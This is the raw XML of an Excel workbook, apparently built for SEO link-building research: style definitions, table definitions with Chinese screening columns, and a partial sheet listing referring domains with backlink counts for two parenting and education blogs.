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b26a73a0f324e49" /></Relationships>
</file>

<file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
<x:workbook xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <x:sheets>
    <x:sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="原始 CSV" sheetId="1" r:id="R1c8fa8367a0e4f00"/>
    <x:sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="汇总" sheetId="2" r:id="R3331726245ad4724"/>
    <x:sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="逐条筛选" sheetId="3" r:id="Ra7fe9e575aac42a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7">
    <x:font>
      <x:sz val="11"/>
      <x:name val="Carlito"/>
    </x:font>
    <x:font>
      <x:b/>
      <x:sz val="11"/>
      <x:color rgb="FFFFFFFF"/>
      <x:name val="Carlito"/>
    </x:font>
    <x:font>
      <x:b/>
      <x:sz val="16"/>
      <x:color rgb="FFFFFFFF"/>
      <x:name val="Carlito"/>
    </x:font>
    <x:font>
      <x:b/>
      <x:sz val="11"/>
      <x:color rgb="FF334155"/>
      <x:name val="Carlito"/>
    </x:font>
    <x:font>
      <x:b/>
      <x:sz val="11"/>
      <x:color rgb="FF0F172A"/>
      <x:name val="Carlito"/>
    </x:font>
    <x:font>
      <x:b/>
      <x:sz val="11"/>
      <x:color rgb="FF134E4A"/>
      <x:name val="Carlito"/>
    </x:font>
    <x:font>
      <x:i/>
      <x:sz val="11"/>
      <x:color rgb="FF64748B"/>
      <x:name val="Carlito"/>
    </x:font>
  </x:fonts>
  <x:fills count="8">
    <x:fill>
      <x:patternFill patternType="none"/>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="gray125"/>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="solid">
        <x:fgColor rgb="FF163B5C"/>
      </x:patternFill>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="solid">
        <x:fgColor rgb="FFE2E8F0"/>
      </x:patternFill>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="solid">
        <x:fgColor rgb="FF0F766E"/>
      </x:patternFill>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="solid">
        <x:fgColor rgb="FFCCFBF1"/>
      </x:patternFill>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="solid">
        <x:fgColor rgb="FFF1F5F9"/>
      </x:patternFill>
    </x:fill>
    <x:fill>
      <x:patternFill patternType="solid">
        <x:fgColor rgb="FF334155"/>
      </x:patternFill>
    </x:fill>
  </x:fills>
  <x:borders count="20">
    <x:border/>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93">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1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="201"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202" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>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left"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="2" fillId="2" borderId="1"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applyAlignment="1">
      <x:alignment horizontal="left" vertical="center"/>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x:xf>
    <x:xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top" wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3"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3" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="202" fontId="0" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3"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3"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3" fillId="0" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="202" fontId="0" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3"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0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="0" fillId="3" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="0" fillId="3" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="4" fillId="3" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="4" fillId="3" borderId="19"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18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top" wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="5" fillId="5" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment vertical="top" wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <x:xf numFmtId="0" fontId="0" fillId="6" borderId="1"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wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="3" fillId="6" borderId="1"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applyAlignment="1">
      <x:alignment wrapText="1"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="0"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="0"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="0"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="0"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="1" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="0"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="1" fillId="7" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="0"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="1" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <x:alignment wrapText="1"/>
    </x:xf>
  </x:cellXfs>
  <x:cellStyles count="1">
    <x:cellStyle name="Normal" xfId="0"/>
  </x:cellStyles>
  <x:dxfs count="7">
    <x:dxf>
      <x:font>
        <x:b/>
        <x:color rgb="FF166534"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:bgColor rgb="FFDCFCE7"/>
        </x:patternFill>
      </x:fill>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b/>
        <x:color rgb="FF92400E"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:bgColor rgb="FFFEF3C7"/>
        </x:patternFill>
      </x:fill>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b/>
        <x:color rgb="FF9A3412"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:bgColor rgb="FFFFEDD5"/>
        </x:patternFill>
      </x:fill>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b/>
        <x:color rgb="FF991B1B"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:bgColor rgb="FFFEE2E2"/>
        </x:patternFill>
      </x:fill>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b/>
        <x:color rgb="FF374151"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:bgColor rgb="FFE5E7EB"/>
        </x:patternFill>
      </x:fill>
    </x:dxf>
    <x:dxf>
      <x:font>
        <x:b/>
        <x:color rgb="FF166534"/>
      </x:font>
      <x:fill>
        <x:patternFill patternType="solid">
          <x:bgColor rgb="FFDCFCE7"/>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81c27c4c7054aab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="/xl/theme/theme1.xml" Id="R74881246c830477f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="/xl/sharedStrings.xml" Id="Rf990334d6b8b47f5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="/xl/worksheets/sheet1.xml" Id="R1c8fa8367a0e4f00" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="/xl/worksheets/sheet2.xml" Id="R3331726245ad4724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="/xl/worksheets/sheet3.xml" Id="Ra7fe9e575aac42a4" /></Relationships>
</file>

<file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
<x:table xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="RawCsvTable" displayName="RawCsvTable" ref="A1:C554" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <x:tableColumns count="3">
    <x:tableColumn id="1" name="﻿Domain"/>
    <x:tableColumn id="2" name="https://www.littlelifelonglearners.com/ BacklinksCount"/>
    <x:tableColumn id="3" name="https://natashalh.com/ BacklinksCount"/>
  </x:tableColumns>
  <x:tableStyleInfo name="TableStyleMedium2" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</x:table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<x:table xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="ScreeningTable" displayName="ScreeningTable" ref="A1:T554" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <x:tableColumns count="20">
    <x:tableColumn id="1" name="序号"/>
    <x:tableColumn id="2" name="域名"/>
    <x:tableColumn id="3" name="首页 URL"/>
    <x:tableColumn id="4" name="A: littlelifelonglearners"/>
    <x:tableColumn id="5" name="B: natashalh"/>
    <x:tableColumn id="6" name="HTTP 状态"/>
    <x:tableColumn id="7" name="访问结果"/>
    <x:tableColumn id="8" name="最终 URL"/>
    <x:tableColumn id="9" name="页面标题"/>
    <x:tableColumn id="10" name="站点主题/类型"/>
    <x:tableColumn id="11" name="相关性"/>
    <x:tableColumn id="12" name="投稿/资源信号"/>
    <x:tableColumn id="13" name="提交入口/证据 URL"/>
    <x:tableColumn id="14" name="筛选结论"/>
    <x:tableColumn id="15" name="优先级"/>
    <x:tableColumn id="16" name="筛选理由"/>
    <x:tableColumn id="17" name="首页摘要"/>
    <x:tableColumn id="18" name="检查方式"/>
    <x:tableColumn id="19" name="核验日期"/>
    <x:tableColumn id="20" name="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69d05705d154017" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="/xl/tables/table2.xml" Id="Rc61f62361d9740a9" /></Relationships>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24" hidden="0" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1">
      <x:c r="A1" s="92" t="str">
        <x:v>﻿Domain</x:v>
      </x:c>
      <x:c r="B1" s="92" t="str">
        <x:v>https://www.littlelifelonglearners.com/ BacklinksCount</x:v>
      </x:c>
      <x:c r="C1" s="92" t="str">
        <x:v>https://natashalh.com/ BacklinksCount</x:v>
      </x:c>
    </x:row>
    <x:row r="2">
      <x:c r="A2" s="86" t="str">
        <x:v>https://msemilylibrary.com</x:v>
      </x:c>
      <x:c r="B2" s="86" t="str">
        <x:v>125</x:v>
      </x:c>
      <x:c r="C2" s="86" t="str">
        <x:v>69</x:v>
      </x:c>
    </x:row>
    <x:row r="3">
      <x:c r="A3" s="86" t="str">
        <x:v>https://blogspot.com</x:v>
      </x:c>
      <x:c r="B3" s="86" t="str">
        <x:v>116</x:v>
      </x:c>
      <x:c r="C3" s="86" t="str">
        <x:v>4128</x:v>
      </x:c>
    </x:row>
    <x:row r="4">
      <x:c r="A4" s="86" t="str">
        <x:v>https://growingajeweledrose.com</x:v>
      </x:c>
      <x:c r="B4" s="86" t="str">
        <x:v>64</x:v>
      </x:c>
      <x:c r="C4" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="5">
      <x:c r="A5" s="86" t="str">
        <x:v>https://helpscoutdocs.com</x:v>
      </x:c>
      <x:c r="B5" s="86" t="str">
        <x:v>57</x:v>
      </x:c>
      <x:c r="C5" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="6">
      <x:c r="A6" s="86" t="str">
        <x:v>https://bing.com</x:v>
      </x:c>
      <x:c r="B6" s="86" t="str">
        <x:v>49</x:v>
      </x:c>
      <x:c r="C6" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="7">
      <x:c r="A7" s="86" t="str">
        <x:v>https://kidsactivitiesblog.com</x:v>
      </x:c>
      <x:c r="B7" s="86" t="str">
        <x:v>32</x:v>
      </x:c>
      <x:c r="C7" s="86" t="str">
        <x:v>8</x:v>
      </x:c>
    </x:row>
    <x:row r="8">
      <x:c r="A8" s="86" t="str">
        <x:v>https://loudestlibrarian.com</x:v>
      </x:c>
      <x:c r="B8" s="86" t="str">
        <x:v>30</x:v>
      </x:c>
      <x:c r="C8" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="9">
      <x:c r="A9" s="86" t="str">
        <x:v>https://teacherspayteachers.com</x:v>
      </x:c>
      <x:c r="B9" s="86" t="str">
        <x:v>28</x:v>
      </x:c>
      <x:c r="C9" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="10">
      <x:c r="A10" s="86" t="str">
        <x:v>https://tinybeans.com</x:v>
      </x:c>
      <x:c r="B10" s="86" t="str">
        <x:v>16</x:v>
      </x:c>
      <x:c r="C10" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="11">
      <x:c r="A11" s="86" t="str">
        <x:v>https://samozj.cn</x:v>
      </x:c>
      <x:c r="B11" s="86" t="str">
        <x:v>15</x:v>
      </x:c>
      <x:c r="C11" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="12">
      <x:c r="A12" s="86" t="str">
        <x:v>https://melissaanddoug.com</x:v>
      </x:c>
      <x:c r="B12" s="86" t="str">
        <x:v>14</x:v>
      </x:c>
      <x:c r="C12" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="13">
      <x:c r="A13" s="86" t="str">
        <x:v>https://rightfromthestart.blog</x:v>
      </x:c>
      <x:c r="B13" s="86" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="C13" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="14">
      <x:c r="A14" s="86" t="str">
        <x:v>https://weareteachers.com</x:v>
      </x:c>
      <x:c r="B14" s="86" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="C14" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="15">
      <x:c r="A15" s="86" t="str">
        <x:v>https://glowscotland.org.uk</x:v>
      </x:c>
      <x:c r="B15" s="86" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="C15" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="16">
      <x:c r="A16" s="86" t="str">
        <x:v>https://wordpress.com</x:v>
      </x:c>
      <x:c r="B16" s="86" t="str">
        <x:v>12</x:v>
      </x:c>
      <x:c r="C16" s="86" t="str">
        <x:v>10</x:v>
      </x:c>
    </x:row>
    <x:row r="17">
      <x:c r="A17" s="86" t="str">
        <x:v>https://monspetits.com</x:v>
      </x:c>
      <x:c r="B17" s="86" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="C17" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="18">
      <x:c r="A18" s="86" t="str">
        <x:v>https://schaefferhomes.com</x:v>
      </x:c>
      <x:c r="B18" s="86" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="C18" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="19">
      <x:c r="A19" s="86" t="str">
        <x:v>https://teachinglittles.com</x:v>
      </x:c>
      <x:c r="B19" s="86" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="C19" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="20">
      <x:c r="A20" s="86" t="str">
        <x:v>https://parentmap.com</x:v>
      </x:c>
      <x:c r="B20" s="86" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="C20" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="21">
      <x:c r="A21" s="86" t="str">
        <x:v>https://in8818.com</x:v>
      </x:c>
      <x:c r="B21" s="86" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="C21" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="22">
      <x:c r="A22" s="86" t="str">
        <x:v>https://esvpnapp.com</x:v>
      </x:c>
      <x:c r="B22" s="86" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="C22" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="23">
      <x:c r="A23" s="86" t="str">
        <x:v>https://bloglovin.com</x:v>
      </x:c>
      <x:c r="B23" s="86" t="str">
        <x:v>9</x:v>
      </x:c>
      <x:c r="C23" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="24">
      <x:c r="A24" s="86" t="str">
        <x:v>https://merakimother.com</x:v>
      </x:c>
      <x:c r="B24" s="86" t="str">
        <x:v>9</x:v>
      </x:c>
      <x:c r="C24" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="25">
      <x:c r="A25" s="86" t="str">
        <x:v>https://artycraftykids.com</x:v>
      </x:c>
      <x:c r="B25" s="86" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="C25" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="26">
      <x:c r="A26" s="86" t="str">
        <x:v>https://findingmyselfyoung.com</x:v>
      </x:c>
      <x:c r="B26" s="86" t="str">
        <x:v>8</x:v>
      </x:c>
      <x:c r="C26" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="27">
      <x:c r="A27" s="86" t="str">
        <x:v>https://schoolandcollegelistings.com</x:v>
      </x:c>
      <x:c r="B27" s="86" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="C27" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="28">
      <x:c r="A28" s="86" t="str">
        <x:v>https://myteachingcupboard.com</x:v>
      </x:c>
      <x:c r="B28" s="86" t="str">
        <x:v>7</x:v>
      </x:c>
      <x:c r="C28" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="29">
      <x:c r="A29" s="86" t="str">
        <x:v>https://mosswoodconnections.com</x:v>
      </x:c>
      <x:c r="B29" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="C29" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="30">
      <x:c r="A30" s="86" t="str">
        <x:v>https://reachformontessori.com</x:v>
      </x:c>
      <x:c r="B30" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C30" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="31">
      <x:c r="A31" s="86" t="str">
        <x:v>https://constantcontact.com</x:v>
      </x:c>
      <x:c r="B31" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C31" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="32">
      <x:c r="A32" s="86" t="str">
        <x:v>https://lulladoll.com</x:v>
      </x:c>
      <x:c r="B32" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C32" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="33">
      <x:c r="A33" s="86" t="str">
        <x:v>https://yaelkeon.com</x:v>
      </x:c>
      <x:c r="B33" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C33" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="34">
      <x:c r="A34" s="86" t="str">
        <x:v>https://hiphoorayletsplay.com</x:v>
      </x:c>
      <x:c r="B34" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C34" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="35">
      <x:c r="A35" s="86" t="str">
        <x:v>https://freelibrary.org</x:v>
      </x:c>
      <x:c r="B35" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C35" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="36">
      <x:c r="A36" s="86" t="str">
        <x:v>https://ohcreativeday.com</x:v>
      </x:c>
      <x:c r="B36" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C36" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="37">
      <x:c r="A37" s="86" t="str">
        <x:v>https://squarespace.com</x:v>
      </x:c>
      <x:c r="B37" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C37" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="38">
      <x:c r="A38" s="86" t="str">
        <x:v>https://youcandiyblog.com</x:v>
      </x:c>
      <x:c r="B38" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C38" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="39">
      <x:c r="A39" s="86" t="str">
        <x:v>https://ththsearch.top</x:v>
      </x:c>
      <x:c r="B39" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C39" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="40">
      <x:c r="A40" s="86" t="str">
        <x:v>https://mommypoppins.com</x:v>
      </x:c>
      <x:c r="B40" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C40" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="41">
      <x:c r="A41" s="86" t="str">
        <x:v>https://craftering.com</x:v>
      </x:c>
      <x:c r="B41" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C41" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="42">
      <x:c r="A42" s="86" t="str">
        <x:v>https://thesavvymamma.com</x:v>
      </x:c>
      <x:c r="B42" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C42" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="43">
      <x:c r="A43" s="86" t="str">
        <x:v>https://susieofalltrades.com</x:v>
      </x:c>
      <x:c r="B43" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C43" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="44">
      <x:c r="A44" s="86" t="str">
        <x:v>https://castleandkite.com</x:v>
      </x:c>
      <x:c r="B44" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C44" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="45">
      <x:c r="A45" s="86" t="str">
        <x:v>https://grokipedia.com</x:v>
      </x:c>
      <x:c r="B45" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C45" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="46">
      <x:c r="A46" s="86" t="str">
        <x:v>https://otholly.com</x:v>
      </x:c>
      <x:c r="B46" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C46" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="47">
      <x:c r="A47" s="86" t="str">
        <x:v>https://adorecherishlove.com</x:v>
      </x:c>
      <x:c r="B47" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C47" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="48">
      <x:c r="A48" s="86" t="str">
        <x:v>https://weebly.com</x:v>
      </x:c>
      <x:c r="B48" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C48" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="49">
      <x:c r="A49" s="86" t="str">
        <x:v>https://tracyharris.co</x:v>
      </x:c>
      <x:c r="B49" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C49" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="50">
      <x:c r="A50" s="86" t="str">
        <x:v>https://halo2.cc</x:v>
      </x:c>
      <x:c r="B50" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C50" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="51">
      <x:c r="A51" s="86" t="str">
        <x:v>https://colorandkindness.com</x:v>
      </x:c>
      <x:c r="B51" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C51" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="52">
      <x:c r="A52" s="86" t="str">
        <x:v>https://luke.lol</x:v>
      </x:c>
      <x:c r="B52" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C52" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="53">
      <x:c r="A53" s="86" t="str">
        <x:v>https://majegant.com</x:v>
      </x:c>
      <x:c r="B53" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C53" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="54">
      <x:c r="A54" s="86" t="str">
        <x:v>https://sisterswhat.com</x:v>
      </x:c>
      <x:c r="B54" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C54" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="55">
      <x:c r="A55" s="86" t="str">
        <x:v>https://csie.cc</x:v>
      </x:c>
      <x:c r="B55" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C55" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="56">
      <x:c r="A56" s="86" t="str">
        <x:v>https://findglocal.com</x:v>
      </x:c>
      <x:c r="B56" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
